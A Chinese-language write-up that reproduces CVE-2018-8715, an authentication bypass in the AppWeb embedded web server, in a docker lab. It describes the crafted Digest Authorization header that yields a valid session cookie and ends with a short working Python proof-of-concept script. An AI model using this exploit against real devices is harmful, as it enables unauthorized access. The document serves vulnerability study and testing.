简介
AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。
AppWeb可以进行认证配置,其认证方式包括以下三种:
1、basic 传统HTTP基础认证
2、digest 改进版HTTP基础认证,认证成功后将使用Cookie来保存状态,而不用再传递Authorization头
3、form 表单认证
漏洞复现
我们这里使用docker快速搭建靶场环境
访问http://your-ip:8080即可访问
利用该漏洞需要知道一个已存在的用户名,当前环境下用户名为admin。
构造头Authorization: Digest username=admin,并发送如下数据包
可见,因为我们没有传入密码字段,所以服务端出现错误,直接返回了200,且包含一个session
-http-session-=1::http.session::e8cc70ede2c32aa9e336338c812a81a6
我们设置POST和session和用户即可通过认证
返回状态码为200,成功绕过身份验证
假设我们又用户名了就可以利用了,这里附上poc
import requests
import sys
print '''
Userage: python appweb.py http://192.168.20.128:8080/ admin
'''
url = sys.argv[1]
user = sys.argv[2]
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36',
'Authorization':'Digest username='+user
}
response = requests.post(url,headers=headers)
if(response.status_code == 200):
print response.headers['Set-Cookie']
else:
print "No Vul ,CVE-2018-8715!"